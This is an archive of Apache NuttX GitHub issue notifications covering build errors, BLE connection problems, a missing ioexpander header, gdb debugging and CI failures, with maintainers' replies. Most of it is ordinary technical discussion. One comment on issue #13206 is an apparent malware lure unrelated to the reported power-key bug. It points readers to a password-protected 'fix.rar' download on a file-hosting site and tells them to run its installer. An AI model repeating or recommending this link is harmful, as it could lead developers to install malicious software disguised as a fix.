[I] [BUG] [nuttx]

2025-07-01 Thread via GitHub
sumpfralle opened a new issue, #16655: URL: https://github.com/apache/nuttx/issues/16655 ### Description / Steps to reproduce the issue 1. enable profiling: ``` CONFIG_FRAME_POINTER=y CONFIG_PROFILE_ALL=y CONFIG_PROFILE_MINI=y ``` 1. see compilatio

Re: [I] [BUG] nuttx-aware debugging with gdb: fail to load pynuttx `fs` module [nuttx]

2025-06-16 Thread via GitHub
sumpfralle commented on issue #16507: URL: https://github.com/apache/nuttx/issues/16507#issuecomment-2975838939 Thank you for fixing this issue! -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to th

Re: [I] [BUG] nuttx-aware debugging with gdb: fail to load pynuttx `fs` module [nuttx]

2025-06-13 Thread via GitHub
xiaoxiang781216 closed issue #16507: [BUG] nuttx-aware debugging with gdb: fail to load pynuttx `fs` module URL: https://github.com/apache/nuttx/issues/16507 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above t

Re: [I] [BUG] nuttx-aware debugging with gdb: fail to load pynuttx `fs` module [nuttx]

2025-06-12 Thread via GitHub
XuNeo commented on issue #16507: URL: https://github.com/apache/nuttx/issues/16507#issuecomment-2969206478 Sorry for the late reply. Could you please try patch https://github.com/apache/nuttx/pull/16527? -- This is an automated message from the Apache Git Service. To respond to the messag

Re: [I] [BUG] nuttx-aware debugging with gdb: fail to load pynuttx `fs` module [nuttx]

2025-06-10 Thread via GitHub
xiaoxiang781216 commented on issue #16507: URL: https://github.com/apache/nuttx/issues/16507#issuecomment-2960991344 @XuNeo and @Donny9 could you look at this problem? -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use th

[I] [BUG] nuttx-aware debugging with gdb: fail to load pynuttx `fs` module [nuttx]

2025-06-10 Thread via GitHub
sumpfralle opened a new issue, #16507: URL: https://github.com/apache/nuttx/issues/16507 ### Description / Steps to reproduce the issue I tried to follow the instructions for [nuttx-aware debugging with gdb](https://nuttx.apache.org/docs/latest/quickstart/debugging.html#with-gdb).

[I] [BUG] [nuttx]

2025-06-05 Thread via GitHub
lljwork2021 opened a new issue, #16488: URL: https://github.com/apache/nuttx/issues/16488 ### Description / Steps to reproduce the issue ~/nuttxspace$ git clone https://github.com/apache/nuttx.git nuttx -b releases/12.5 ~/nuttxspace$ git clone https://github.com/apache/nuttx-ap

Re: [I] [BUG] [nuttx]

2025-03-23 Thread via GitHub
xiaoxiang781216 closed issue #15983: [BUG] URL: https://github.com/apache/nuttx/issues/15983 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-un

Re: [I] [BUG] [nuttx]

2025-03-12 Thread via GitHub
eren-terzioglu commented on issue #15983: URL: https://github.com/apache/nuttx/issues/15983#issuecomment-2720134545 Hi, I will have a look to it. Thanks for reporting. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use

[I] [BUG] [nuttx]

2025-03-12 Thread via GitHub
yezhonghui2024 opened a new issue, #15983: URL: https://github.com/apache/nuttx/issues/15983 ### Description / Steps to reproduce the issue I want enable xtensa esp32s3 i2c slave, step by follow: step1: ./tools/configure.sh -E esp32s3-devkit:nsh step2: make menuconfig, open c

Re: [I] [BUG] [nuttx]

2025-03-09 Thread via GitHub
fdcavalcanti commented on issue #15807: URL: https://github.com/apache/nuttx/issues/15807#issuecomment-2709202663 I've never had this: ` /usr/bin/bash: line 1: olddefconfig: command not found`. Are your apps and nuttx on master branch? Do the `git clean` trick on both and checkout to

Re: [I] [BUG] [nuttx]

2025-03-08 Thread via GitHub
Justin-Morrison-github commented on issue #15807: URL: https://github.com/apache/nuttx/issues/15807#issuecomment-2708414836 > Usually this happens when you change critical stuff without `distcleaning` first. Changing KConfig files in this condition could cause this kind of behavior. If you

Re: [I] [BUG] [nuttx]

2025-03-05 Thread via GitHub
fdcavalcanti commented on issue #15807: URL: https://github.com/apache/nuttx/issues/15807#issuecomment-2700675535 Usually this happens when you change critical stuff without `distcleaning` first. Changing KConfig files in this condition could cause this kind of behavior. If you run `git cle

Re: [I] [BUG] [nuttx]

2025-03-01 Thread via GitHub
Justin-Morrison-github commented on issue #15807: URL: https://github.com/apache/nuttx/issues/15807#issuecomment-2692342352 > hi [@Justin-Morrison-github](https://github.com/Justin-Morrison-github) it seems related to wrong path > > ``` > apps/examples/hello_rust/Kconfig' not found

Re: [I] [BUG] [nuttx]

2025-02-12 Thread via GitHub
fdcavalcanti commented on issue #15807: URL: https://github.com/apache/nuttx/issues/15807#issuecomment-2653851828 Run `git clean -xfdn` on your apps folder after you `make distclean` on `nuttx`. See if there are pending files there. -- This is an automated message from the Apache Git S

Re: [I] [BUG] [nuttx]

2025-02-11 Thread via GitHub
simbit18 commented on issue #15807: URL: https://github.com/apache/nuttx/issues/15807#issuecomment-2650197438 hi @Justin-Morrison-github it seems related to wrong path ``` apps/examples/hello_rust/Kconfig' not found (in 'source "/home/morri/InSpace/InSpace-Nuttx/apps/examples/hello

[I] [BUG] [nuttx]

2025-02-10 Thread via GitHub
Justin-Morrison-github opened a new issue, #15807: URL: https://github.com/apache/nuttx/issues/15807 ### Description / Steps to reproduce the issue Hi, I am a Carleton InSpace Rocket Team member and have issues configuring NuttX for my Raspberry Pi Pico W. Carleton's master branch sho

Re: [I] [BUG] [nuttx]

2025-02-10 Thread via GitHub
raiden00pl closed issue #15788: [BUG] URL: https://github.com/apache/nuttx/issues/15788 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubsc

Re: [I] [BUG] [nuttx]

2025-02-10 Thread via GitHub
raiden00pl commented on issue #15788: URL: https://github.com/apache/nuttx/issues/15788#issuecomment-2647198932 > Failed to restore IRKs from store; status=8 This message is expected. -- This is an automated message from the Apache Git Service. To respond to the message, please log

Re: [I] [BUG] [nuttx]

2025-02-09 Thread via GitHub
hujun260 commented on issue #15788: URL: https://github.com/apache/nuttx/issues/15788#issuecomment-2646884938 > Thanks for the reply! [@raiden00pl](https://github.com/raiden00pl) I switched to 12.6-RC1, or 12.8, and the tests are all fine. I can now detect BLE advertisements and establish c

Re: [I] [BUG] [nuttx]

2025-02-09 Thread via GitHub
zhihui2015 commented on issue #15788: URL: https://github.com/apache/nuttx/issues/15788#issuecomment-2646822492 Thanks for the reply! @raiden00pl I switched to 12.6-RC1, or 12.8, and the tests are all fine. I can now detect BLE advertisements and establish connections using nrf-connect. Bo

Re: [I] [BUG] [nuttx]

2025-02-09 Thread via GitHub
hujun260 commented on issue #15788: URL: https://github.com/apache/nuttx/issues/15788#issuecomment-2646724409 Please help me verify it. https://github.com/apache/nuttx/pull/15797 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to Git

Re: [I] [BUG] [nuttx]

2025-02-09 Thread via GitHub
hujun260 commented on issue #15788: URL: https://github.com/apache/nuttx/issues/15788#issuecomment-2646135308 OK -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscr

Re: [I] [BUG] [nuttx]

2025-02-08 Thread via GitHub
raiden00pl commented on issue #15788: URL: https://github.com/apache/nuttx/issues/15788#issuecomment-2645739344 master is broken by this commit 620f4bc32f7641c85ab86dffe6e0b9f52d20581a -- This is an automated message from the Apache Git Service. To respond to the message, please log on to

Re: [I] [BUG] [nuttx]

2025-02-08 Thread via GitHub
raiden00pl commented on issue #15788: URL: https://github.com/apache/nuttx/issues/15788#issuecomment-2645721758 I confirm that it doesn't work with release 12.6, but it works with 12.7 and 12.8. Master branch is also broken -- This is an automated message from the Apache Git Service. To r

Re: [I] [BUG] [nuttx]

2025-02-08 Thread via GitHub
zhihui2015 commented on issue #15788: URL: https://github.com/apache/nuttx/issues/15788#issuecomment-2645430450 @raiden00pl Thanks for your reply! With NuttX, I can successfully flash using J-Link. After flashing, the log output is as follows: ``` ABCDE▒nx_mount: found p

Re: [I] [BUG] [nuttx]

2025-02-07 Thread via GitHub
raiden00pl commented on issue #15788: URL: https://github.com/apache/nuttx/issues/15788#issuecomment-2644560143 I haven't seen this before because I always use `nuttx` (elf file) or `nuttx.hex`. `nuttx.bin` it is hge which doesn't look good: ``` -rwxr-xr-x 1 raiden00 ra

[I] [BUG] [nuttx]

2025-02-07 Thread via GitHub
zhihui2015 opened a new issue, #15788: URL: https://github.com/apache/nuttx/issues/15788 ### Description / Steps to reproduce the issue 1. The project version used is NuttX-12.6.0, and the compiler version is arm-none-eabi-gcc (Arm GNU Toolchain 13.2.rel1 (Build arm-13.7)) 13.2.1 2

Re: [I] [BUG] [nuttx]

2025-02-04 Thread via GitHub
zouboan closed issue #15747: [BUG] URL: https://github.com/apache/nuttx/issues/15747 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-unsubscr..

Re: [I] [BUG] [nuttx]

2025-02-04 Thread via GitHub
zouboan commented on issue #15747: URL: https://github.com/apache/nuttx/issues/15747#issuecomment-2633793912 yes 获取Outlook for Android From: Alan C. Assis ***@***.***> Sent: Tuesday, February 4, 2025 8:33:29 PM To

Re: [I] [BUG] [nuttx]

2025-02-04 Thread via GitHub
acassis commented on issue #15747: URL: https://github.com/apache/nuttx/issues/15747#issuecomment-2633775512 @zouboan is the issue fixed? -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the speci

[I] [BUG] [nuttx]

2025-02-03 Thread via GitHub
zouboan opened a new issue, #15747: URL: https://github.com/apache/nuttx/issues/15747 ### Description / Steps to reproduce the issue Today, I pulled and synchronized the latest NuttX, but after successfully compiling it, I found that it failed to run. Through the process of bis

Re: [I] [BUG] nuttx/ioexpander/mcp23x08.h is missing [nuttx]

2025-01-20 Thread via GitHub
xiaoxiang781216 closed issue #15592: [BUG] nuttx/ioexpander/mcp23x08.h is missing URL: https://github.com/apache/nuttx/issues/15592 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comme

Re: [I] [BUG] nuttx/ioexpander/mcp23x08.h is missing [nuttx]

2025-01-17 Thread via GitHub
acassis commented on issue #15592: URL: https://github.com/apache/nuttx/issues/15592#issuecomment-2599159659 @paolovolpi good finding, actually it was missing in my PR: https://github.com/apache/nuttx/commit/4b67e23049f2f4904a79adafdcc0d3d06d29555a Could you please use mcp23x17.h as b

[I] [BUG] nuttx/ioexpander/mcp23x08.h is missing [nuttx]

2025-01-17 Thread via GitHub
paolovolpi opened a new issue, #15592: URL: https://github.com/apache/nuttx/issues/15592 ### Description / Steps to reproduce the issue Enable DeviceDrivers/IO Expander Gpio Support/MCP23008 make -j got the following compilation error: CC: environ/env_getenv.c In file includ

Re: [I] [BUG] [nuttx]

2024-12-18 Thread via GitHub
xiaoxiang781216 closed issue #15189: [BUG] URL: https://github.com/apache/nuttx/issues/15189 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-un

Re: [I] [BUG] [nuttx]

2024-12-16 Thread via GitHub
anchao commented on issue #15189: URL: https://github.com/apache/nuttx/issues/15189#issuecomment-2545027091 @anjiahao1 @GUIDINGLI -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific com

[I] [BUG] [nuttx]

2024-12-14 Thread via GitHub
gpfly opened a new issue, #15189: URL: https://github.com/apache/nuttx/issues/15189 ### Description / Steps to reproduce the issue nuttx/fs/procfs/fs_procfsmeminfo.c:398 missing ',' ``` linesize = procfs_snprintf(procfile->line, MEMINFO_LINELEN,

Re: [I] [BUG] [nuttx]

2024-12-06 Thread via GitHub
tmedicci commented on issue #15063: URL: https://github.com/apache/nuttx/issues/15063#issuecomment-2523102831 > could you split the fix from [apache/nuttx-apps#2879](https://github.com/apache/nuttx-apps/pull/2879)? so we can merge it as fast as possible. I will do it right now. --

Re: [I] [BUG] [nuttx]

2024-12-05 Thread via GitHub
cuiziwei1 closed issue #15063: [BUG] https://github.com': No such device or address> URL: https://github.com/apache/nuttx/issues/15063 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific com

Re: [I] [BUG] [nuttx]

2024-12-05 Thread via GitHub
xiaoxiang781216 commented on issue #15063: URL: https://github.com/apache/nuttx/issues/15063#issuecomment-2521898123 could you split the fix from https://github.com/apache/nuttx-apps/pull/2879? so we can merge it as fast as possible. -- This is an automated message from the Apache Git Ser

Re: [I] [BUG] [nuttx]

2024-12-05 Thread via GitHub
tmedicci commented on issue #15063: URL: https://github.com/apache/nuttx/issues/15063#issuecomment-2521240966 I'm testing https://github.com/apache/nuttx/issues/15063#issuecomment-2520403890 to solve this issue. It didn't fail running the CI locally. -- This is an automated message from

[I] [BUG] [nuttx]

2024-12-05 Thread via GitHub
cuiziwei1 opened a new issue, #15063: URL: https://github.com/apache/nuttx/issues/15063 ### Description / Steps to reproduce the issue Normalize esp32-devkitc/mqttc Configuration/Tool: esp32-dev

Re: [I] [BUG] [nuttx]

2024-12-05 Thread via GitHub
xiaoxiang781216 commented on issue #15063: URL: https://github.com/apache/nuttx/issues/15063#issuecomment-2520403890 @tmedicci please look at this problem, which happen today with every pr. -- This is an automated message from the Apache Git Service. To respond to the message, please log o

[I] [BUG] [nuttx]

2024-10-14 Thread via GitHub
anjiahao1 opened a new issue, #14260: URL: https://github.com/apache/nuttx/issues/14260 ### Description / Steps to reproduce the issue I have been using libarchive in nuttx, and everything was fine until stdio.h included the nuttx header file. There was a conflict between the header f

[I] [BUG] [nuttx]

2024-09-20 Thread via GitHub
TimJTi opened a new issue, #13562: URL: https://github.com/apache/nuttx/issues/13562 ### Description / Steps to reproduce the issue Perhaps due to me upgrading my arm gcc cross compiler recently, I'm seeing a compiler warning because of the definition of __CONCAT - in my case this is

Re: [I] [BUG] [nuttx]

2024-09-15 Thread via GitHub
xiaoxiang781216 closed issue #13206: [BUG] URL: https://github.com/apache/nuttx/issues/13206 -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: commits-un

Re: [I] [BUG] [nuttx]

2024-08-27 Thread via GitHub
acassis commented on issue #13206: URL: https://github.com/apache/nuttx/issues/13206#issuecomment-2313917831 NuttX doesn't support any chip with his name, please search all supported microcontrollers/processors at https://github.com/apache/nuttx/tree/master/arch -- This is an automated me

Re: [I] [BUG] [nuttx]

2024-08-27 Thread via GitHub
luke7999 commented on issue #13206: URL: https://github.com/apache/nuttx/issues/13206#issuecomment-2313914707 The 2700h is chip name. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific

Re: [I] [BUG] [nuttx]

2024-08-27 Thread via GitHub
acassis commented on issue #13206: URL: https://github.com/apache/nuttx/issues/13206#issuecomment-2313392255 @luke7999 what is bes2700h ? I cannot find any reference to it in NuttX source code -- This is an automated message from the Apache Git Service. To respond to the message, please l

Re: [I] [BUG] [nuttx]

2024-08-27 Thread via GitHub
HarbingerOfFire commented on issue #13206: URL: https://github.com/apache/nuttx/issues/13206#issuecomment-2312806066 Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc." -- This is an automated message from t

[I] [BUG] [nuttx]

2024-08-27 Thread via GitHub
luke7999 opened a new issue, #13206: URL: https://github.com/apache/nuttx/issues/13206 ### Description / Steps to reproduce the issue The power key is ineffective when first pressed in bes2700h ### On which OS does this issue occur? [Linux] ### What is the version